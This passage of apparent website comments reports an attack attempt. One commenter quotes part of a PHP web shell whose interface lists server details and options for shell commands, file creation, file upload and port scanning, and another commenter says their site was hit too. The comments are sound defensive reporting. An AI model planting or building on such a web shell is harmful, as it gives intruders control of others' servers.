also not just that … check it out … it tries to create a php shell of some sorts
echo “<center><h1>system</h1></center><p><hr><p>\n”;
echo “<i>Server: ” . $_SERVER [‘SERVER_NAME’] . “<br>\n”;
echo “Current directory: ” . getcwd () . “<br>\n”;
echo “Software: ” . $_SERVER [‘SERVER_SOFTWARE’] . “
\n\n
</i>\n”;
echo “
\n\n\n
“;
echo “<table width = 50%>”;
echo “<tr>”;
echo “<td>Shell Command</td>\n”;
echo “<td>Create a new file</td>\n”;
echo “<td>Upload file</td>\n”;
echo “<td>Port Scan</td>\n”;
echo “</tr></table>”;
echo “
\n\n
“;
wow !!!
I just had the same attack attempt on one of the websites I manage, I also noticed that this piece of code does not exist on the files in GitHub. In any case thank you for reporting this I was about to do the same 🙂
